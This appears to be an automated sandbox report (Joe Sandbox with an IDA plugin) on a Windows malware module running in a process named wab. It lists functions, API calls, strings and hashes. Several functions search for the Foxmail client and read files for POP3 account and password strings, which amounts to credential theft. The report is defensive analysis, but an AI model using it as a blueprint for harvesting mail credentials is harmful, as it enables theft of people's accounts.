7632->7628 7687 23d724b5 7633->7687 7635 23d723e5 7635->7613 7636->7615 7639 23d746dc 7637->7639 7638 23d72ada _ValidateLocalCookies 5 API calls 7640 23d71fad 7638->7640 7639->7638 7640->7616 7641 23d723b3 7640->7641 7642 23d723b8 ___scrt_release_startup_lock 7641->7642 7643 23d72933 ___isa_available_init IsProcessorFeaturePresent 7642->7643 7644 23d723c1 7642->7644 7643->7644 7644->7620 7646 23d72491 7645->7646 7647 23d734ea 7646->7647 7648 23d734ef ___vcrt_initialize_winapi_thunks 7647->7648 7659 23d73936 7648->7659 7651 23d734fd 7651->7627 7653 23d73505 7654 23d73510 7653->7654 7655 23d73972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7653->7655 7654->7627 7655->7651 7683 23d77457 7656->7683 7660 23d7393f 7659->7660 7662 23d73968 7660->7662 7663 23d734f9 7660->7663 7673 23d73be0 7660->7673 7664 23d73972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7662->7664 7663->7651 7665 23d738e8 7663->7665 7664->7663 7678 23d73af1 7665->7678 7668 23d738fd 7668->7653 7669 23d73ba2 ___vcrt_FlsSetValue 6 API calls 7670 23d7390b 7669->7670 7671 23d73918 7670->7671 7672 23d7391b ___vcrt_uninitialize_ptd 6 API calls 7670->7672 7671->7653 7672->7668 7674 23d73a82 try_get_function 5 API calls 7673->7674 7675 23d73bfa 7674->7675 7676 23d73c03 7675->7676 7677 23d73c18 InitializeCriticalSectionAndSpinCount 7675->7677 7676->7660 7677->7676 7679 23d73a82 try_get_function 5 API calls 7678->7679 7680 23d73b0b 7679->7680 7681 23d73b24 TlsAlloc 7680->7681 7682 23d738f2 7680->7682 7682->7668 7682->7669 7686 23d77470 7683->7686 7684 23d72ada _ValidateLocalCookies 5 API calls 7685 23d724a3 7684->7685 7685->7631 7685->7632 7686->7684 7688 23d724c4 7687->7688 7689 23d724c8 7687->7689 7688->7635 7690 23d72639 ___scrt_fastfail 4 API calls 7689->7690 7692 23d724d5 ___scrt_release_startup_lock 7689->7692 7691 23d72559 7690->7691 7692->7635 7693 23d7543d 7694 23d75440 7693->7694 7695 23d755a8 _abort 38 API calls 7694->7695 7696 23d7544c 7695->7696 6919 23d7c7a7 6920 23d7c7be 6919->6920 6927 23d7c80d 6919->6927 6920->6927 6928 23d7c7e6 GetModuleHandleA 6920->6928 6922 23d7c835 GetModuleHandleA 6922->6927 6923 23d7c872 6924 23d7c85f GetProcAddress 6924->6927 6927->6922 6927->6923 6927->6924 6929 23d7c7ef 6928->6929 6935 23d7c80d 6928->6935 6937 23d7c803 GetProcAddress 6929->6937 6931 23d7c835 GetModuleHandleA 6931->6935 6932 23d7c872 6935->6931 6935->6932 6936 23d7c85f GetProcAddress 6935->6936 6936->6935 6938 23d7c80d 6937->6938 6939 23d7c835 GetModuleHandleA 6938->6939 6940 23d7c872 6938->6940 6941 23d7c85f GetProcAddress 6938->6941 6939->6938 6941->6938 6942 23d721a1 ___scrt_dllmain_exception_filter 6943 23d760ac 6944 23d760dd 6943->6944 6946 23d760b7 6943->6946 6945 23d760c7 FreeLibrary 6945->6946 6946->6944 6946->6945 7697 23d7742b 7698 23d77430 7697->7698 7699 23d77453 7698->7699 7701 23d78bae 7698->7701 7702 23d78bdd 7701->7702 7703 23d78bbb 7701->7703 7702->7698 7704 23d78bd7 7703->7704 7705 23d78bc9 RtlDeleteCriticalSection 7703->7705 7706 23d7571e _free 20 API calls 7704->7706 7705->7704 7705->7705 7706->7702

                                                              Executed Functions

                                                              Function 23D710F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23D71137
                                                              • lstrcatW.KERNEL32(?,?), ref: 23D71151
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23D7115C
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23D7116D
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23D7117C
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23D71193
                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 23D711D0
                                                              • FindClose.KERNEL32(00000000), ref: 23D711DB
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                              • String ID:
                                                              • API String ID: 1083526818-0
                                                              • Opcode ID: 7c421e7cd06c39da32bbef26412baf468e3140935f1d85fccc1e6d4489b50e18
                                                              • Instruction ID: 607348a98dd29a1ae8c0125a60072ecc3060de4593d67e49c721a137ac179fb3
                                                              • Opcode Fuzzy Hash: 7c421e7cd06c39da32bbef26412baf468e3140935f1d85fccc1e6d4489b50e18
                                                              • Instruction Fuzzy Hash: F32191725043486BD720EA649C48F9B7BACEF94714F040A6EBA98D31D0EB34D61987A6
                                                              Function 23D712EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 23D71434
                                                                • Part of subcall function 23D710F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23D71137
                                                                • Part of subcall function 23D710F1: lstrcatW.KERNEL32(?,?), ref: 23D71151
                                                                • Part of subcall function 23D710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23D7115C
                                                                • Part of subcall function 23D710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23D7116D
                                                                • Part of subcall function 23D710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 23D7117C
                                                                • Part of subcall function 23D710F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23D71193
                                                                • Part of subcall function 23D710F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 23D711D0
                                                                • Part of subcall function 23D710F1: FindClose.KERNEL32(00000000), ref: 23D711DB
                                                              • lstrlenW.KERNEL32(?), ref: 23D714C5
                                                              • lstrlenW.KERNEL32(?), ref: 23D714E0
                                                              • lstrlenW.KERNEL32(?,?), ref: 23D7150F
                                                              • lstrcatW.KERNEL32(00000000), ref: 23D71521
                                                              • lstrlenW.KERNEL32(?,?), ref: 23D71547
                                                              • lstrcatW.KERNEL32(00000000), ref: 23D71553
                                                              • lstrlenW.KERNEL32(?,?), ref: 23D71579
                                                              • lstrcatW.KERNEL32(00000000), ref: 23D71585
                                                              • lstrlenW.KERNEL32(?,?), ref: 23D715AB
                                                              • lstrcatW.KERNEL32(00000000), ref: 23D715B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                              • String ID: )$Foxmail$ProgramFiles
                                                              • API String ID: 672098462-2938083778
                                                              • Opcode ID: 5f9b43cb0ad4af9aafdb39524eb316f6816b767e4e5d6b17ab356fa396220d15
                                                              • Instruction ID: 7b4e77b883f46a9e60167dc6a3318ce958acd0df7df09e2d7a280d92b44455db
                                                              • Opcode Fuzzy Hash: 5f9b43cb0ad4af9aafdb39524eb316f6816b767e4e5d6b17ab356fa396220d15
                                                              • Instruction Fuzzy Hash: 1E81B271A00358A9DB30DBA1DC85FDE777DEF84700F0015DAF508E7190EA716A8ACBA5

                                                              Non-executed Functions

                                                              Function 23D760E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 23D761DA
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 23D761E4
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 23D761F1
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: 1c4f80d4adc87312445648165959cc441b81197e616f261f163af3a6ae4d23a4
                                                              • Instruction ID: 906f5bb21ba19a875a5093d01ce4e8080e6da7ee6c543259e32dc9e95ed5b420
                                                              • Opcode Fuzzy Hash: 1c4f80d4adc87312445648165959cc441b81197e616f261f163af3a6ae4d23a4
                                                              • Instruction Fuzzy Hash: 0E31D47591121CABCB21DF24D988BCDBBB8FF18710F5041DAE81CA7250E7349B958F55
                                                              Function 23D74AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,23D74A8A,?,23D82238,0000000C,23D74BBD,00000000,00000000,00000001,23D72082,23D82108,0000000C,23D71F3A,?), ref: 23D74AD5
                                                              • TerminateProcess.KERNEL32(00000000,?,23D74A8A,?,23D82238,0000000C,23D74BBD,00000000,00000000,00000001,23D72082,23D82108,0000000C,23D71F3A,?), ref: 23D74ADC
                                                              • ExitProcess.KERNEL32 ref: 23D74AEE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 85b5e00ecc8c35abcdcb58b72601c6a7315aa4e46ce803e6e5358c7e287ac710
                                                              • Instruction ID: 3cbcf8a73b4199a7ba65c03cfeae00c4e80eb05f9155d62ff5813cfaf9488de6
                                                              • Opcode Fuzzy Hash: 85b5e00ecc8c35abcdcb58b72601c6a7315aa4e46ce803e6e5358c7e287ac710
                                                              • Instruction Fuzzy Hash: A8E0B636500218AFCF127F64CD0AA4A3B79FF51745B50405DFA058B161EB39ED62CA54
                                                              Function 23D7724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: ea17d0935bbba42369622825c29cb2c601e62e1961d8a0d26f9fe2d0e51e03b2
                                                              • Instruction ID: d84791ec31eb7da91dc677c01f89eed462fd4912eb58c323195c78e34086b5f6
                                                              • Opcode Fuzzy Hash: ea17d0935bbba42369622825c29cb2c601e62e1961d8a0d26f9fe2d0e51e03b2
                                                              • Instruction Fuzzy Hash: C2A011322002028F8300AE30820A20C3AACAA20280300002AA80CC0080FB38C0228A00
                                                              Function 23D7173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 23D71CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D1B
                                                                • Part of subcall function 23D71CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23D71D37
                                                                • Part of subcall function 23D71CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D4B
                                                              • _strlen.LIBCMT ref: 23D71855
                                                              • _strlen.LIBCMT ref: 23D71869
                                                              • _strlen.LIBCMT ref: 23D7188B
                                                              • _strlen.LIBCMT ref: 23D718AE
                                                              • _strlen.LIBCMT ref: 23D718C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strlen$File$CopyCreateDelete
                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                              • API String ID: 3296212668-3023110444
                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction ID: 754d8def6b58c45a1c43032efebbf5dd73c698d4c568df2d697316cd6d031a41
                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction Fuzzy Hash: 636133B1D00318ABEF21CBA4C840BDEB7B9AF55200F0442DED255B7288EB745A47CF66
                                                              Function 23D719B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                              • API String ID: 4218353326-230879103
                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction ID: 10e00d4f21c746b58f38367779caf73e30c200fcee73f8a369f1abab3cb69209
                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction Fuzzy Hash: 7371F771D003689BDB229BB49888ADF7BFCAF15604F1440DEE644D7241EA749786CBA0
                                                              Function 23D77CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 203 23d77cc2-23d77cd6 204 23d77d44-23d77d4c 203->204 205 23d77cd8-23d77cdd 203->205 207 23d77d93-23d77dab call 23d77e35 204->207 208 23d77d4e-23d77d51 204->208 205->204 206 23d77cdf-23d77ce4 205->206 206->204 209 23d77ce6-23d77ce9 206->209 217 23d77dae-23d77db5 207->217 208->207 211 23d77d53-23d77d90 call 23d7571e * 4 208->211 209->204 212 23d77ceb-23d77cf3 209->212 211->207 215 23d77cf5-23d77cf8 212->215 216 23d77d0d-23d77d15 212->216 215->216 219 23d77cfa-23d77d0c call 23d7571e call 23d790ba 215->219 222 23d77d17-23d77d1a 216->222 223 23d77d2f-23d77d43 call 23d7571e * 2 216->223 220 23d77db7-23d77dbb 217->220 221 23d77dd4-23d77dd8 217->221 219->216 227 23d77dd1 220->227 228 23d77dbd-23d77dc0 220->228 231 23d77df0-23d77dfc 221->231 232 23d77dda-23d77ddf 221->232 222->223 229 23d77d1c-23d77d2e call 23d7571e call 23d791b8 222->229 223->204 227->221 228->227 238 23d77dc2-23d77dd0 call 23d7571e * 2 228->238 229->223 231->217 236 23d77dfe-23d77e0b call 23d7571e 231->236 233 23d77de1-23d77de4 232->233 234 23d77ded 232->234 233->234 241 23d77de6-23d77dec call 23d7571e 233->241 234->231 238->227 241->234
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 23D77D06
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D790D7
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D790E9
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D790FB
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D7910D
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D7911F
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D79131
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D79143
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D79155
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D79167
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D79179
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D7918B
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D7919D
                                                                • Part of subcall function 23D790BA: _free.LIBCMT ref: 23D791AF
                                                              • _free.LIBCMT ref: 23D77CFB
                                                                • Part of subcall function 23D7571E: HeapFree.KERNEL32(00000000,00000000,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?), ref: 23D75734
                                                                • Part of subcall function 23D7571E: GetLastError.KERNEL32(?,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?,?), ref: 23D75746
                                                              • _free.LIBCMT ref: 23D77D1D
                                                              • _free.LIBCMT ref: 23D77D32
                                                              • _free.LIBCMT ref: 23D77D3D
                                                              • _free.LIBCMT ref: 23D77D5F
                                                              • _free.LIBCMT ref: 23D77D72
                                                              • _free.LIBCMT ref: 23D77D80
                                                              • _free.LIBCMT ref: 23D77D8B
                                                              • _free.LIBCMT ref: 23D77DC3
                                                              • _free.LIBCMT ref: 23D77DCA
                                                              • _free.LIBCMT ref: 23D77DE7
                                                              • _free.LIBCMT ref: 23D77DFF
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: c1f4ad3247c0e508e66ca423df08511b62fbdc47d167b7bb74b8f597da2934e2
                                                              • Instruction ID: 2b93a7f870f15c3f38520533c651f75db32479d9d67bea86d644ede2c5d93a93
                                                              • Opcode Fuzzy Hash: c1f4ad3247c0e508e66ca423df08511b62fbdc47d167b7bb74b8f597da2934e2
                                                              • Instruction Fuzzy Hash: DF314C31600305DFEB21AB38D984BBAB7FAEF40610F1448EEE859D7251DE75E990CB25
                                                              Function 23D759D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • _free.LIBCMT ref: 23D759EA
                                                                • Part of subcall function 23D7571E: HeapFree.KERNEL32(00000000,00000000,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?), ref: 23D75734
                                                                • Part of subcall function 23D7571E: GetLastError.KERNEL32(?,?,23D7924F,?,00000000,?,00000000,?,23D79276,?,00000007,?,?,23D77E5A,?,?), ref: 23D75746
                                                              • _free.LIBCMT ref: 23D759F6
                                                              • _free.LIBCMT ref: 23D75A01
                                                              • _free.LIBCMT ref: 23D75A0C
                                                              • _free.LIBCMT ref: 23D75A17
                                                              • _free.LIBCMT ref: 23D75A22
                                                              • _free.LIBCMT ref: 23D75A2D
                                                              • _free.LIBCMT ref: 23D75A38
                                                              • _free.LIBCMT ref: 23D75A43
                                                              • _free.LIBCMT ref: 23D75A51
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 4681a8e62d08450124a325abedb789e939d9e7405907d7814e2a946e8525dd49
                                                              • Instruction ID: 48eacf6d8128899b86816577bf362f431fd287e41e5d19cb931164ff4d1f86e0
                                                              • Opcode Fuzzy Hash: 4681a8e62d08450124a325abedb789e939d9e7405907d7814e2a946e8525dd49
                                                              • Instruction Fuzzy Hash: 3711B67A520248FFCB21DF54C841DDD3FB6EF54250B0540EDBA088F225DA31DA50DBA2
                                                              Function 23D71CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D1B
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23D71D37
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D4B
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D58
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D72
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D7D
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23D71D8A
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 1454806937-0
                                                              • Opcode ID: 4d41781c3ef08725c7ec5a52715e953b5f1a205d6d2ca6da9c601c5661108576
                                                              • Instruction ID: d52ced8a2ac80652a4083d4772b9611a54bdc96b1e1b6f0dc8098c8e38a224a0
                                                              • Opcode Fuzzy Hash: 4d41781c3ef08725c7ec5a52715e953b5f1a205d6d2ca6da9c601c5661108576
                                                              • Instruction Fuzzy Hash: 4321127294121CBFD720ABA08C8CFEF76BCFB28755F0405AAF515D2184E6749E468B70
                                                              Function 23D79492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 304 23d79492-23d794ef GetConsoleCP 305 23d794f5-23d79511 304->305 306 23d79632-23d79644 call 23d72ada 304->306 308 23d79513-23d7952a 305->308 309 23d7952c-23d7953d call 23d77c19 305->309 310 23d79566-23d79575 call 23d779e6 308->310 315 23d79563-23d79565 309->315 316 23d7953f-23d79542 309->316 310->306 320 23d7957b-23d7959b WideCharToMultiByte 310->320 315->310 318 23d79609-23d79628 316->318 319 23d79548-23d7955a call 23d779e6 316->319 318->306 319->306 326 23d79560-23d79561 319->326 320->306 322 23d795a1-23d795b7 WriteFile 320->322 324 23d7962a-23d79630 GetLastError 322->324 325 23d795b9-23d795ca 322->325 324->306 325->306 327 23d795cc-23d795d0 325->327 326->320 328 23d795d2-23d795f0 WriteFile 327->328 329 23d795fe-23d79601 327->329 328->324 330 23d795f2-23d795f6 328->330 329->305 331 23d79607 329->331 330->306 332 23d795f8-23d795fb 330->332 331->306 332->329
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,23D79C07,?,00000000,?,00000000,00000000), ref: 23D794D4
                                                              • __fassign.LIBCMT ref: 23D7954F
                                                              • __fassign.LIBCMT ref: 23D7956A
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 23D79590
                                                              • WriteFile.KERNEL32(?,?,00000000,23D79C07,00000000,?,?,?,?,?,?,?,?,?,23D79C07,?), ref: 23D795AF
                                                              • WriteFile.KERNEL32(?,?,00000001,23D79C07,00000000,?,?,?,?,?,?,?,?,?,23D79C07,?), ref: 23D795E8
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.4244165551.0000000023D71000.00000040.00001000.00020000.00000000.sdmp, Offset: 23D70000, based on PE: true
                                                              • Associated: 0000000A.00000002.4244137329.0000000023D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000A.00000002.4244165551.0000000023D86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_23d70000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: e5628b83191262c479b15d1bed32e00fb3d307378dd301a80ca693faee9e0f5a
                                                              • Instruction ID: 37823afbeb11d58287e3df2353416fe6f197233dcdfd36fa7eb4e429168ad120
                                                              • Opcode Fuzzy Hash: e5628b83191262c479b15d1bed32e00fb3d307378dd301a80ca693faee9e0f5a
                                                              • Instruction Fuzzy Hash: 9251B5B2D002099FCB10CFA8C895AEEBBF9EF19710F14415EE955E7281E770E941CB60
                                                              Function 23D73370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 333 23d73370-23d733b5 call 23d73330 call 23d737a7 338 23d733b7-23d733c9 333->338 339 23d73416-23d73419 333->339 341 23d73439-23d73442 338->341 342 23d733cb 338->342 340 23d7341b-23d73428 call 23d73790 339->340 339->341 345 23d7342d-23d73436 call 23d73330 340->345 344 23d733d0-23d733e7 342->344 346 23d733fd 344->346 347 23d733e9-23d733f7 call 23d73740 344->347 345->341 350 23d73400-23d73405 346->350 354 23d7340d-23d73414 347->354 355 23d733f9 347->355 350->344 353 23d73407-23d73409 350->353 353->341 356 23d7340b 353->356 354->345 357 23d73443-23d7344c 355->357 358 23d733fb 355->358 356->345 359 23d73486-23d73496 call 23d73774 357->359 360 23d7344e-23d73455 357->360 358->350 365 23d734aa-23d734c6 call 23d73330 call 23d73758 359->365 366 23d73498-23d734a7 call 23d73790 359->366 360->359 362 23d73457-23d73466 call 23d7bbe0 360->362 370 23d73483 362->370 371 23d73468-23d73480 362->371 366->365 370->359 371->370
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 23D7339B
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 23D733A3
                                                              • _ValidateLocalCookies.LIBCMT ref: 23D73431
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 23D7345C
                                                              • _ValidateLocalCookies.LIBCMT ref: 23D734B1
                                                              Strings
                                                              Memory Dump Source
